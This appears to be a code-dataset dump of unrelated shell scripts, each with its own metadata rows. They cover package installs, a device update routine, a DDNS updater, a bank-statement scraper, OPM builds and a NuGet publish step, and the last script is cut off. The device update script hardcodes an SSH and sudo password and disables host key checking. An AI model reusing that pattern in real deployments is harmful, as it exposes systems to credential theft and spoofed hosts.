echo "SYS_OS_DIST_NAME=$SYS_OS_DIST_NAME"
echo "SYS_OS_DIST_ID=$SYS_OS_DIST_ID"
echo "SYS_OS_DIST_VERSION=$SYS_OS_DIST_VERSION"
fi
}
# Delete all the images with <none> tag
function docker_rmi_none {
for img in $(docker images | grep "<none>" | awk '{ print $3 }'); do
echo "$img"
docker rmi "$img"
done
}
function brew_cleanup {
brew cleanup
brew cask cleanup
brew uninstall "$(brew list)" || true
brew cask uninstall "$(brew cask list)" || true
brew prune
}
| true |
729bc00b83f575ce4ef7b6afb55e7149714a1e83
|
Shell
|
Nifury/onnxruntime
|
/tools/ci_build/github/linux/docker/scripts/manylinux/install_centos.sh
|
UTF-8
| 382 | 2.90625 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
os_major_version=$(cat /etc/redhat-release | tr -dc '0-9.'|cut -d \. -f1)
echo "installing for os major version : $os_major_version"
yum install -y which gdb redhat-lsb-core expat-devel tar unzip zlib-devel make libunwind bzip2 bzip2-devel
# Install Java
# Install automatic documentation generation dependencies
yum install -y java-11-openjdk-devel graphviz
| true |
7e26d2ba9749d4f4d2807c44a979f58c646d9793
|
Shell
|
hhoegelo/C15
|
/build-tools/create-c15-update/update_scripts/bbb_update.sh
|
UTF-8
| 2,568 | 3.9375 | 4 |
[] |
no_license
|
#!/bin/sh
#
# Author: Anton Schmied
# version : 2.0
#
# ----------- install a BBB Updates from USB-Stick ---------
#
# This script will transfer the /preset-manager/* and settings.xml to the ePC
# and update the BBB excluding the /update directory
#
EPC_IP=$1
BBB_IP=$2
report_and_quit(){
printf "$1" >> /update/errors.log
exit $2
}
executeAsRoot() {
echo "sscl" | /update/utilities/sshpass -p 'sscl' ssh -o ConnectionAttempts=1 -o ConnectTimeout=1 -o StrictHostKeyChecking=no sscl@$EPC_IP \
"sudo -S /bin/bash -c '$1' 1>&2 > /dev/null"
return $?
}
check_preconditions(){
if [ -e /settings.xml ] &&
[ ! -z "$EPC_IP" ] &&
ping -c1 $EPC_IP 1>&2 > /dev/null &&
executeAsRoot "exit" &&
executeAsRoot "mountpoint -q /persistent"; then
return 0
fi
return 1
}
move_files(){
if ! check_preconditions; then
return 1
fi
executeAsRoot "systemctl stop playground"
if [ -d /internalstorage/preset-manager ] && [ "$(ls -A /internalstorage/preset-manager/)" ]; then
executeAsRoot "scp -r root@$BBB_IP:/internalstorage/preset-manager/ /persistent" \
&& rm -rf /internalstorage/preset-manager/* \
&& rm -rf /internalstorage/preset-manager
if [ $? -ne 0 ]; then report_and_quit "E55 BBB update: Moving presets to ePC failed ..." "55"; fi
fi
if [ -e /settings.xml ]; then
executeAsRoot "scp root@$BBB_IP:/settings.xml /persistent/settings.xml" \
&& rm /settings.xml
if [ $? -ne 0 ]; then report_and_quit "E56 BBB update: Moving Settings to ePC failed ..." "56"; fi
fi
if [ -d /internalstorage/calibration ] && [ "$(ls -A /internalstorage/calibration/)" ]; then
executeAsRoot "scp -r root@$BBB_IP:/internalstorage/calibration/ /persistent" \
&& rm -rf /internalstorage/calibration/* \
&& rm -rf /internalstorage/calibration
if [ $? -ne 0 ]; then report_and_quit "E57 BBB update: Moving calibration settings to ePC failed ..." "57"; fi
fi
return 0
}
update(){
mkdir /update/BBB/rootfs \
&& gzip -dc /update/BBB/rootfs.tar.gz | tar -C /update/BBB/rootfs -xf - \
&& LD_LIBRARY_PATH=/update/utilities /update/utilities/rsync -cax --exclude 'etc/hostapd.conf' -f 'P update/' --delete /update/BBB/rootfs/ / \
&& chown -R root.root /update
if [ $? -ne 0 ]; then report_and_quit "E58 BBB update: Syncing rootfs failed ..." "58"; fi
rm -rf /update/BBB/rootfs/*
rm -rf /update/BBB/rootfs
}
main() {
move_files
update
return 0
}
main
| true |
15828e6c2438a7e6fe3d0b73759825861ecf49fe
|
Shell
|
uda446/rodod-soa_aia-brmconnectionpoolreset
|
/BRMConnectionPoolReset.sh
|
UTF-8
| 984 | 2.59375 | 3 |
[] |
no_license
|
#!/bin/bash
#############################################################################################
# File Description: Script to invoke BRMConnectionPoolReset.py #
# File Name: BRMConnectionPoolReset.py #
# Author: Wiacek, Tomasz date: 2020-09-22 #
# Version History: #
# v01 - 2020-09-22 - Initial Script creation #
#############################################################################################
URL=t3://$(hostname):7001
export CONFIG_JVM_ARGS="-Djava.security.egd=file:/dev/./urandom -Dwlst.offline.log=disable"
WLST_HOME=/opt/aia/Middleware_WLS12C/oracle_common/common/bin
PY_HOME=/opt/aia/OperationalScript/BRMConnectionPoolReset
#run wlst script
$WLST_HOME/wlst.sh $PY_HOME/BRMConnectionPoolReset.py $URL $1 $2
| true |
08bd4d650a9fa432a9409b3eeec35bf298565aaa
|
Shell
|
milanowen/ribsnetwork
|
/ddns/cloudxns.sh
|
UTF-8
| 1,184 | 3.828125 | 4 |
[] |
no_license
|
#!/bin/sh
set -e
if [ $1 ]; then
ApiKey=$1
fi
if [ $2 ]; then
SecretKey=$2
fi
if [ $3 ]; then
Domain=$3
fi
if [ -z "$ApiKey" -o -z "$SecretKey" -o -z "$Domain" ]; then
echo "参数缺失"
exit 1
fi
if [ $4 ]; then
Host=$4
fi
if [ -z "$Host" ]; then
Host="@"
fi
ApiRequestDate=$(date)
# $1 = query string
getSignature() {
local message="$ApiKey$1$2$ApiRequestDate$SecretKey"
local sig=$(echo -n "$message" | openssl md5 | awk '{print $2}')
echo $sig
}
sendRequest() {
local sig=$(getSignature "https://www.cloudxns.net/api2/ddns" $1)
local result=$(wget -qO- --no-check-certificate --header="API-KEY: $ApiKey" --header="API-REQUEST-DATE: $ApiRequestDate" --header="API-HMAC: $sig" --post-data "$1" "https://www.cloudxns.net/api2/ddns")
echo $result
}
updateDDNS() {
echo "更新 $Host.$Domain 的 IP..."
local result=$(sendRequest "{\"domain\":\"$Host.$Domain.\"}")
local code=$(echo $result | jq -r '.code')
if [ "$code" = "1" ]; then
echo "更新完成." >&2
else
local message=$(echo $result | jq -r '.message')
echo "更新出错. 错误提示: $message" >&2
exit 1
fi
}
updateDDNS
| true |
4a588678b7a5de3fd18fea54f04c359525d423c8
|
Shell
|
jerrylee1697/rshell
|
/tests/test_test.sh
|
UTF-8
| 585 | 2.59375 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
cd ../bin/
#case 1: simple command with no parameters
echo "Case 1: No Parameter"
cat ../tests/test_test/test1.dat | ./rshell > ../tests/test_test/test1o.dat
#case 2: single parameter
echo "Case 2: Single Parameter"
cat ../tests/test_test/test2.dat | ./rshell > ../tests/test_test/test2o.dat
#case 3: multiple parameters
echo "Case 3: More than 1 Parameters"
cat ../tests/test_test/test3.dat | ./rshell > ../tests/test_test/test3o.dat
#case 4: invalid parameter
echo "Case 4: Invalid Parameter"
cat ../tests/test_test/test4.dat | ./rshell > ../tests/test_test/test4o.dat
| true |
42eccd6d155c4d59da7fdce599ce9e32bd0fd22c
|
Shell
|
tlj1899/cathaycheck
|
/banking.sh
|
UTF-8
| 2,055 | 3.0625 | 3 |
[
"MIT"
] |
permissive
|
#echo "Credentials into ID/PIN/CODE"
URL1=https://www.mybank.com.tw/pweb/
URL2=https://www.mybank.com.tw/pweb/login.asp
URL3=https://www.mybank.com.tw/pweb/main_menu.asp
URL4=https://www.mybank.com.tw/pweb/main_menu_bottom.asp
URL5=https://www.mybank.com.tw/pweb/C01.asp
URL6=https://www.mybank.com.tw/pweb/C01_Download.asp
URL_LOGOUT=https://www.mybank.com.tw/pweb/logout.asp
OUT1=url1.html
OUT2=url2.html
OUT3=url3.html
OUT4=url4.html
OUT6=url6.html
if [ -f cookies.txt ]; then
rm cookies.txt
fi
USERAGENT="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17"
# main page to get cookie
curl \
-ss \
--location \
--user-agent "${USERAGENT}" \
-b cookies.txt \
-c cookies.txt \
${URL1} > ${OUT1}
# logging in
curl \
-ss \
--location \
--user-agent "${USERAGENT}" \
-b cookies.txt \
-c cookies.txt \
--referer ${URL1} \
--data "logon_name=${ID}&logon_pwd=${PIN}&nick_name=${CODE}&ChipCard=N&ComeFrom=MyBank&Fun=&wid=&wp_kind=&FundID=&FundType=&ClickFlag=&capslock_status=&kbdid=" \
${URL2} > ${OUT2}
# menu page
curl \
-ss \
--location \
--user-agent "${USERAGENT}" \
-b cookies.txt \
-c cookies.txt \
--referer ${URL2} \
${URL3} > ${OUT3}
# menu side
curl \
-ss \
--location \
--user-agent "${USERAGENT}" \
-b cookies.txt \
-c cookies.txt \
--referer ${URL3} \
${URL4} > ${OUT4}
# actual data
curl \
-ss \
--location \
--user-agent "${USERAGENT}" \
-b cookies.txt \
-c cookies.txt \
--referer ${URL4} \
${URL5} > url5.html
# data page other
curl \
-ss \
--location \
--user-agent "${USERAGENT}" \
-b cookies.txt \
-c cookies.txt \
--referer ${URL5} \
${URL6} > ${OUT6}
# logging out
curl \
-ss \
--location \
--user-agent "${USERAGENT}" \
-b cookies.txt \
-c cookies.txt \
--referer ${URL6} \
${URL_LOGOUT} > /dev/null
./parsing.py url5.html
| true |
3ed731c2d62ccc4c1c18f43682488e8acb9c4d05
|
Shell
|
Anaconda84/aura
|
/to-distrib.sh
|
UTF-8
| 266 | 2.875 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
DEST=/home/server/aura
DIR=`pwd`
/etc/init.d/aura stop
cd $DEST
find . -maxdepth 1 -name "*" -type d \( -name db \) -prune -o -print | xargs rm -rf
cd $DIR
cp -r ./* $DEST
python sl.py $DEST
chown -R www-data:www-data $DEST
/etc/init.d/aura start
| true |
432af05dc760dd33fbc4708b11c68994781695c0
|
Shell
|
madhavanmalolan/N
|
/n
|
UTF-8
| 344 | 3.359375 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
com=""
for i in `seq $#`
do
com=`echo $com ${!i}`
done
$com
unameOS="$(uname -s)"
case "${unameOS}" in
Linux*)
notify-send "$1 - completed" "Exit code : $?"
;;
Darwin*)
osascript -e 'display notification "Exit code: '"$?"'" with Title "Command \"'"$1"'\" completed"'
;;
esac
| true |
380020d4f60b63d565d18aaa6e91e4bff150b708
|
Shell
|
rafaelmarconiramos/Supervisor
|
/workflows/common/sh/model.sh
|
UTF-8
| 2,053 | 4 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
set -eu
# MODEL.SH
# Shell wrapper around Keras model
usage()
{
echo "Usage: model.sh [-t TIMEOUT] FRAMEWORK PARAMS RUNID"
echo "The environment should have:"
echo " SITE MODEL_NAME EXPID BENCHMARK_TIMEOUT OBJ_RETURN"
echo "If TIMEOUT is provided, we run under the shell command timeout"
}
# set -x
# echo MODEL.SH
TIMEOUT=""
while getopts "t:" OPTION
do
case OPTION in
t) TIMEOUT=$OPTARG ;;
*) exit 1 ;; # Bash prints an error message
esac
done
shift $(( OPTIND - 1 ))
if (( ${#} != 3 ))
then
usage
exit 1
fi
FRAMEWORK=$1 # Usually "keras"
shift
# JSON string of parameters
PARAMS="$1"
shift
RUNID=$1
shift
# Each model run, runs in its own "instance" directory
# Set instance_directory to that and cd into it.
INSTANCE_DIRECTORY=$TURBINE_OUTPUT/run/$RUNID
TIMEOUT_CMD=""
if [ -n "$TIMEOUT" ]; then
TIMEOUT_CMD="timeout $TIMEOUT"
fi
# All stdout/stderr after this point goes into model.log !
mkdir -p $INSTANCE_DIRECTORY
LOG_FILE=$INSTANCE_DIRECTORY/model.log
exec >> $LOG_FILE
exec 2>&1
cd $INSTANCE_DIRECTORY
echo MODEL.SH
# get the site and source lang-app-{SITE} from workflow/common/sh folder
WORKFLOWS_ROOT=$( cd $EMEWS_PROJECT_ROOT/.. ; /bin/pwd )
source $WORKFLOWS_ROOT/common/sh/utils.sh
source_site langs-app $SITE
echo
echo PARAMS:
echo $PARAMS | print_json
echo
echo "USING PYTHON:"
which python
set -x
arg_array=( "$WORKFLOWS_ROOT/common/python/model_runner.py"
"$PARAMS"
"$INSTANCE_DIRECTORY"
"$FRAMEWORK"
"$RUNID"
"$BENCHMARK_TIMEOUT")
MODEL_CMD="python -u ${arg_array[@]}"
# echo MODEL_CMD: $MODEL_CMD
if ! $TIMEOUT_CMD python -u "${arg_array[@]}"
then
# $? is the exit status of the most recently executed command
# (i.e the line above)
CODE=$?
if [ $CODE == 124 ]; then
echo "Timeout error in $MODEL_CMD"
exit 0 # This will trigger a NaN (the result file does not exist)
else
echo "Error in $MODEL_CMD"
exit 1 # Unknown error in Python: abort the workflow
fi
fi
exit 0 # Success
| true |
a5efeeedabd7076dee58a03097d5095243f62cc2
|
Shell
|
WebAhmed/dotfiles-2
|
/scripts/start_ranger.sh
|
UTF-8
| 372 | 2.546875 | 3 |
[] |
no_license
|
#!/bin/bash
if (! tmux has-session -t "ranger" 2> /dev/null); then
tmux new-session -d -s "ranger" -n "ranger"
tmux send-keys -t "ranger:1" "ranger" C-m
tmux attach-session -t "ranger:1"
else
if [ ! "$(ps -elf | grep /usr/bin/ranger | grep python)" ]; then
tmux send-keys -t "ranger:1" "ranger" C-m
fi
tmux attach-session -t "ranger:1"
fi
exit
| true |
e73116e96d0f5b2c7909a2d219e65d70d4e29ee0
|
Shell
|
ballachi/Politehnica
|
/Politehnica/Parser java/tests_greedy_public/checker.sh
|
UTF-8
| 645 | 3.5625 | 4 |
[] |
no_license
|
#!/bin/bash
# fetch tests and results
input_dir="./tests/in"
output_dir="./tests/out"
refs_dir="./tests/ref"
mkdir $output_dir
# compile and make jar
ant compile &>/dev/null
ant jar &>/dev/null
scor=0
tests=10
pointsPerTest=$((100/$tests))
for i in $(seq 1 $tests); do
timeout 10 java -jar tema.jar $input_dir/test$i.in $output_dir/test$i.out &> /dev/null
diff -B $output_dir/test$i.out $refs_dir/test$i.ref &> /dev/null
if test $? -eq 0; then
echo "Test $i correct"
scor=$(($scor+10))
else
echo "Test $i failed"
fi
done
echo "Total [$scor/100] points"
rm $output_dir -r
ant clean &> /dev/null
| true |
63df68c58ac38f28a834901ecebb2d5ba8b6e228
|
Shell
|
LukasRypl/variousLinuxScripts
|
/touchpadToggle.sh
|
UTF-8
| 570 | 3.734375 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
# synclient commandline utility to query and modify Synaptics driver parameters
# notify-send for displaying info
state=$(synclient -l | grep TouchpadOff | awk '{print $3}')
function show() {
notify-send -t 3 "$1"
echo "$1"
}
if [ "$state" == "0" ] ; then
synclient TouchpadOff=1
# TODO Toggle LED state - something like sudo su -c 'echo 0 >/sys/class/leds/dell-laptop::touchpad/brightness'
show "Touchpad is OFF"
elif [ "$state" == "1" ] ; then
synclient TouchpadOff=0
show "Touchpad activated"
else
show "Touchpad state is unknown"
fi
| true |
7a1dfb93ea5be04487855257a703aedde8c430af
|
Shell
|
Artimirche6/TerminalCommand
|
/assignment1/folderExits.sh
|
UTF-8
| 267 | 3.78125 | 4 |
[] |
no_license
|
#! /bin/bash -x
read -p " Enter the folder Name : " folderName
if [ -d $folderName ]
then
echo $folderName folder already exists.
else
echo " $folderName folder doesn't exits "
mkdir $folderName
echo "$folderName folder created "
fi
| true |
ae5019cb08b2b6a176dfc2c2e7cf20f799158919
|
Shell
|
Herrie82/cmst
|
/images/generate.sh
|
UTF-8
| 332 | 2.609375 | 3 |
[] |
no_license
|
#!/bin/bash
#
# Script to enerate differnet size icons.
# dmenu
#
#
for i in 16 20 22 24 32 36 40 48 64 72 96 128 192 256 384 512; do
mkdir -p "./${i}x${i}"
convert ./cmst-icon.svg -transparent white -filter box -resize ${i}x${i} -unsharp 0x6+0.5+0 -background "rgba(0,0,0,0)" -flatten "./${i}x${i}/cmst.png"
done
| true |
2115d958911784c9df8c5eb1c8f7a656a5eabffb
|
Shell
|
samyuyagati/actor-ft-experiments
|
/run_video_benchmark.sh
|
UTF-8
| 1,869 | 2.921875 | 3 |
[] |
no_license
|
#!/bin/bash
# 'failure' flag can be omitted to achieve a failure-free execution.
# 'recovery' flag has three possible values: app_lose_frames (app-level
# recovery that tolerates missing frames), app_keep_frames (app-level recovery
# that does not tolerate missing frames), and checkpoint (the default, which
# simulates global checkpointing + rollback).
# DO NOT set the checkpoint-freq flag unless you want checkpoint recovery.
# ----- Run benchmarks -----
# Simulate one failure about halfway through processing and with
# simulated application-level recovery that tolerates missing frames.
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --recovery app_lose_frames
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --failure --recovery app_lose_frames
# Simulate one failure about halfway through processing and with
# simulated application-level recovery that does not allow missing frames.
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --recovery app_keep_frames
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --failure --recovery app_keep_frames
# Simulate one failure about halfway through processing and with
# simulated global checkpointing for recovery. To vary the checkpoint frequency,
# simply specify a different number with the checkpoint-freq flag (the
# command below sets it to one checkpoint per ten frames processed).
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --checkpoint-freq 30 --recovery checkpoint
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --failure --checkpoint-freq 30 --recovery checkpoint
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --checkpoint-freq 30 --recovery log
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --failure --checkpoint-freq 30 --recovery log
| true |
49fd0bc1f35b924b708a70bdbd31d3a10cc8a585
|
Shell
|
JOJO-IAP/drycore
|
/header.sh
|
UTF-8
| 627 | 3.65625 | 4 |
[] |
no_license
|
#!/usr/bin/env bash
#------------------------------------------------------------------------------#
# Basic functions used throughout this repo
#------------------------------------------------------------------------------#
# Raise error
raise() {
echo "Usage: $usage" >&2
echo "Error: $2" >&2
exit $1
}
# Check NCL log. NCL sometimes fails to spawn child process for displaying time
# information -- ignore these errors. Also Execute.c is always shown as error
# alongside specific function error, so ignore that one.
nclcheck() {
! cat $1 | grep -v 'Execute.c' | grep -v 'systemfunc' | grep 'fatal:' &>/dev/null
}
| true |
ac8f06cdb9310026c03f220de6fc105fe7aacfb6
|
Shell
|
livingstonb/WorkFromHome
|
/OES/build/code/unzip_data.sh
|
UTF-8
| 112 | 2.90625 | 3 |
[] |
no_license
|
#!/bin/bash
zips=$(find build/input/raw -name "*.zip")
for zip in $zips
do
unzip -n "$zip" -d "${zip%.*}"
done
| true |
5051fc3a298b01683d130d61858eec807bde2e7a
|
Shell
|
lukechurch/sintr
|
/analysis_server_example/tools/compact_datasets.sh
|
UTF-8
| 1,066 | 2.8125 | 3 |
[
"Apache-2.0"
] |
permissive
|
set -e
echo "Sync dart-usage to liftoff-dev"
gsutil -m cp -n gs://dart-analysis-server-sessions-sorted/compressed/* \
gs://liftoff-dev-datasources-analysis-server-sessions-sorted
echo "Backup"
gsutil -m cp -n -r gs://dart-analysis-server-sessions-sorted \
gs://dart-analysis-server-sessions-sorted-backup
echo "Sync to archive"
gsutil -m cp -n -r gs://dart-analysis-server-sessions-sorted \
gs://dart-analysis-server-sessions-sorted-archive
gsutil -m cp -n -r gs://liftoff-dev-datasources-analysis-server-sessions-sorted/* \
gs://liftoff-dev-datasources-archive-dra/liftoff-dev-datasources/analysis-server-sessions
gsutil -m cp -n -r gs://liftoff-dev-results \
gs://liftoff-dev-results-archive
echo "Delete files in the incoming buckets that are older than 45 days"
dart bin/delete_older_than.dart dart-usage dart-analysis-server-sessions-sorted 45
dart bin/delete_older_than.dart liftoff-dev liftoff-dev-datasources-analysis-server-sessions-sorted 45
echo "Delete old results"
dart bin/delete_older_than.dart liftoff-dev liftoff-dev-results 45
| true |
28f129138ea9c842c29a5c4df56d3857f1732c63
|
Shell
|
PapaZack80/retroroller
|
/mame2003-plus-libretro/PKGBUILD
|
UTF-8
| 883 | 2.5625 | 3 |
[] |
no_license
|
# Maintainer: valadaa48 <valadaa48@gmx.com>
_pkgname=mame2003-plus-libretro
pkgname=mame2003plus_libretro
pkgver=2611.0134c428
pkgrel=1
pkgdesc="Updated 2018 version of MAME (0.78) for libretro. with added game support plus many fixes and improvements "
arch=('aarch64')
url="https://github.com/libretro/mame2003-plus-libretro"
license=('GPL')
makedepends=('git')
source=(
'git+https://github.com/libretro/mame2003-plus-libretro'
'target.patch'
)
md5sums=('SKIP'
'82e179db876c6524a22c8670ac5f79d5')
pkgver() {
cd ${_pkgname}
echo "$(git rev-list --count HEAD).$(git rev-parse --short HEAD)"
}
prepare() {
cd ${_pkgname}
patch -p1 < ../target.patch
}
build() {
cd ${_pkgname}
make platform=goadvance V=1 VERBOSE=1 clean
make platform=goadvance V=1 VERBOSE=1
}
package() {
install -Dm755 ${_pkgname}/mame2003_plus_libretro.so -t ${pkgdir}/usr/share/libretro
}
| true |
59b1df0884794ddd5e9b08f40e24cba5b56cfc6a
|
Shell
|
theosp/osp-dist
|
/sys-root/home/theosp/.bash/function/recursive_search.sh
|
UTF-8
| 789 | 3.734375 | 4 |
[] |
no_license
|
#!/bin/bash
# Recursive search string in path's files
# rs(needle, path=".")
rs () {
local needle="$1"
local path="${2:-.}"
find "$path" -type f -exec grep -Hn "$1" {} \;
}
# Limited recursive search, drops lines that exceeds given lenght
lrs () {
local needle="$1"
local max_length="${LRS_MAX_LENGHT:-"$2"}"
local max_length="${max_length:-"350"}"
local path="${3:-.}"
rs "$needle" "$path" | platformSed -e "s/\([^:]*:[^:]*:\).\{$max_length\}.*/\\1 <<<Too Long line replaced > $max_length >>>/g"
if [[ ! $LRS_QUIET == "true" ]]; then
echo ""
echo "// lrs notes "
echo "// use LRS_QUIET="true" to hide this section"
echo "// use LRS_MAX_LENGHT to change the max line length allowed (current $max_length)"
fi
}
# vim:ft=bash:
| true |
996fe015860d0f5c52520ce043e1c7ba6b03bb12
|
Shell
|
duanyiting2018/Rogic_RaspberryPi
|
/duanyiting/28.sh
|
UTF-8
| 264 | 2.734375 | 3 |
[] |
no_license
|
passed(){
a=$1
echo "passed():\$0 is $0"
echo "passed():\$1 is $1"
echo "passed():args:$#"
echo "passed():all args (\$@) passed to me - \"$@\""
}
echo "**** calling passed() first ****"
passed one
echo "**** calling passed() second ****"
passed one two three
| true |
ce4b557b274151548652349164226dabae06e6c4
|
Shell
|
cxy592394546/Distribute-System-Homework
|
/homework1/1853444-hw1-q4.sh
|
UTF-8
| 2,027 | 3.234375 | 3 |
[] |
no_license
|
#!/bin/bash
#脚本运行前提为已在远程机器上配置完成免密登陆所需条件!!!
scriptfile1=1853444-hw1-q2.sh
scriptfile2=1853444-hw1-q3.sh
log_file_name=1853444-hw1-q3.log
new_file_name=1853444-hw1-q4.log
path=/mnt/e/分布式系统/hw1/temp
cpdir1=cp1
cpdir2=cp2
cpdir3=cp3
if [ ! -f "./$new_file_name" ]
then
touch ./$new_file_name
elif [ -f "./$new_file_name" ]
then
rm ./$new_file_name
touch ./$new_file_name
fi
sum=0.00
ip_addr=(100.68.120.250 192.168.91.140 192.168.91.141)
#数组ip_addr中元素为实验中使用的另外三台机器的ip地址,其中第一台为centos7系统(数组中ip地址为实验时的ip地址),后两台为win10系统上运行的centos8虚拟机
if [ ! -d "$path/$cpdir1" ]
then
mkdir $path/$cpdir1
elif [ -f "$path/$cpdir1/*" ]
then
rm $path/$cpdir1/*
fi
ssh xinyu@${ip_addr[0]} <$scriptfile1
ssh xinyu@${ip_addr[0]} <$scriptfile2
scp xinyu@${ip_addr[0]}:/home/xinyu/$log_file_name $path/$cpdir1
val1=$(awk 'NR == 4 {print $NF}' $path/$cpdir1/$log_file_name)
echo -n "平均值1 $val1 " >> ./$new_file_name
sum=$(echo "scale=2;$sum+$val1" | bc)
if [ ! -d "$path/$cpdir2" ]
then
mkdir $path/$cpdir2
elif [ -f "$path/$cpdir2/*" ]
then
rm $path/$cpdir2/*
fi
ssh xinyu@${ip_addr[1]} < $scriptfile1
ssh xinyu@${ip_addr[1]} < $scriptfile2
scp xinyu@${ip_addr[1]}:/home/xinyu/$log_file_name $path/$cpdir2
val2=$(awk 'NR == 4 {print $6}' $path/$cpdir2/$log_file_name)
echo -n "平均值2 $val2 " >> ./$new_file_name
sum=$(echo "scale=2;$sum+$val2" | bc)
if [ ! -d "$path/$cpdir3" ]
then
mkdir $path/$cpdir3
elif [ -f "$path/$cpdir3/*" ]
then
rm $path/$cpdir3/*
fi
ssh xinyu@${ip_addr[2]} < $scriptfile1
ssh xinyu@${ip_addr[2]} < $scriptfile2
scp xinyu@${ip_addr[2]}:/home/xinyu/$log_file_name $path/$cpdir3
val3=$(awk 'NR == 4 {print $6}' $path/$cpdir3/$log_file_name)
echo "平均值3 $val3 " >> ./$new_file_name
sum=$(echo "scale=2;$sum+$val3" | bc)
aval=$(echo "scale=2;$sum/3" | bc)
echo "平均值 0$aval" >> ./$new_file_name
echo "平均值 0$aval"
| true |
b42bd5eac37811d68623248798fde56d6371e93b
|
Shell
|
rustamatics/rumo
|
/turtles/android-shell/bin/clean
|
UTF-8
| 249 | 3.1875 | 3 |
[] |
no_license
|
#!/bin/bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
ROOT="$( cd $DIR/../ && pwd)"
external_build=$ROOT/app/.externalNativeBuild
if [ -d $external_build ]; then
# echo "Clearing External Build Cache"
rm -rf $external_build;
fi
| true |
3273668b9852161dbe65804d3e7d5c733260debc
|
Shell
|
hnil/opm-build
|
/build_opm.sh
|
UTF-8
| 3,055 | 3.484375 | 3 |
[] |
no_license
|
#!/bin/bash
BUILD_ERT_EIGEN=false # also libecl
#BUILD_LIBECL_EIGEN=false
CLEAN_BUILD=false
CMAKE_FILE=opm-building/debugopts_mpi.cmake
UPDATE=true
NP=1
if [ ! -d opm-src ]; then
echo "opm-src do not exit"
exit 1
fi
cd opm-src
# to do full build with ont ert and eigen this needs to be uncommented
if [ "$BUILD_ERT_EIGEN" == true ]; then
echo "INSTALLING ERT and EIGEN"
if [ -d libecl ]; then
cd libecl
if [ ! -d build ];then
mkdir build
fi
if [ "$UPDATE" == true ]; then
git pull
if [ $? -eq 0 ]; then
echo "update ${r} succesfully"
else
echo "update of ${r} failed"
exit 1;
fi
fi
if [ "$CLEAN_BUILD" == true ]; then
echo "clean build by deleting build directory"
rm -rf build
mkdir build
fi
cd build
cmake ..
make -j $NP
sudo make install
cd ../../
else
echo "libecrl notexist"
exit 1;
fi
# if [ -d ert ]; then
# cd ert
# if [ ! -d build ];then
# mkdir build
# fi
# if [ "$UPDATE" == true ]; then
# git pull
# if [ $? -eq 0 ]; then
# echo "update ${r} succesfully"
# else
# echo "update of ${r} failed"
# exit 1;
# fi
# fi
# cd build
# cmake .. -DBUILD_PYTHON=ON -DBUILD_APPLICATIONS=ON -DCMAKE_BUILD_TYPE=Release
# make -j $NP
# sudo make install
# cd ../../
# else
# echo "ert not exist"
# exit 1;
# fi
if [ -d eigen3 ]; then
cd eigen3
if [ ! -d build ];then
mkdir build
fi
if [ "$UPDATE" == true ]; then
git pull
if [ $? -eq 0 ]; then
echo "update ${r} succesfully"
else
echo "update of ${r} failed"
exit 1;
fi
fi
if [ "$CLEAN_BUILD" == true ]; then
echo "clean build by deleting build directory"
rm -rf build
mkdir build
fi
cd build
cmake ..
sudo make install
cd ../../
else
echo "eigen not exist"
exit 1;
fi
fi
master_order='opm-common opm-parser opm-material opm-grid opm-output opm-core ewoms opm-simulators opm-upscaling'
#master_order='opm-common opm-parser opm-material opm-grid opm-output opm-core ewoms opm-simulators opm-upscaling'
repos=$master_order
for r in $repos; do
if [ -d "$r" ]; then
cd "${r}"
else
echo " do not exit ${r} exist"
exit 1
fi
if( [ ! -d build ]); then
mkdir build
fi
if [ "$CLEAN_BUILD" == true ]; then
echo "clean build by deleting build directory"
rm -rf build
mkdir build
fi
if [ "$UPDATE" == true ]; then
git pull
if [ $? -eq 0 ]; then
echo "update ${r} succesfully"
else
echo "update of ${r} failed"
exit 1;
fi
fi
cd build
if [ "$CLEAN_BUILD" == true ]; then
echo "Start cmake ${r}"
#cmake -C $CMAKE_FILE
cmake -DUSE_MPI=1 ..
if [ $? -eq 0 ]; then
echo "cmake ${r} succesfully"
else
echo "cmake of ${r} failed"
exit 1;
fi
fi
echo "Start compiling ${r}"
make -j $NP
if [ $? -eq 0 ]; then
echo "compiled ${r} succesfully"
else
echo "compilation of ${r} failed"
exit 1;
fi
cd ../../
done
| true |
978c865f8cf998002403b1bf6728358c4c1164fa
|
Shell
|
malscent/IntervalCronGenerator
|
/publish.sh
|
UTF-8
| 2,205 | 3.5625 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
export CSPROJ_PATH="./IntervalCronGenerator.Core/"
export PROJECT_NAME="IntervalCronGenerator.Core.csproj"
export GIT_BRANCH=$(git branch | cut -c 3-)
export TEST_PROJECT="./IntervalCronGeneratorTests/IntervalCronGeneratorTests.csproj"
export NUGET_SERVER="https://api.nuget.org/v3/index.json"
export BUILD_DIR="./build"
export TOOL_DIR="./IntervalCronGeneratorCLI/"
export TOOL_PROJECT_NAME="IntervalCronGeneratorCLI.csproj"
set -eu
project=$(basename -s .csproj "$CSPROJ_PATH$PROJECT_NAME")
version=$(sed -n 's:.*<Version>\(.*\)</Version>.*:\1:p' "$CSPROJ_PATH$PROJECT_NAME")
version_suffix='--version-suffix "pre"'
toolproject=$(basename -s .csproj "$TOOL_DIR$TOOL_PROJECT_NAME")
tool_version=$(sed -n 's:.*<Version>\(.*\)</Version>.*:\1:p' "$TOOL_DIR$TOOL_PROJECT_NAME")
nupkg_file=./build/$project.$version-pre.nupkg
tool_file=./build/$toolproject.$tool_version-pre.nupkg
echo "Project: $project"
echo "Branch: $GIT_BRANCH"
echo "Testing $project version: $version"
dotnet test "$TEST_PROJECT"
# Nuget packages default to "pre" release unless on master
if [ "$GIT_BRANCH" == "master" ]; then
echo "Building production release"
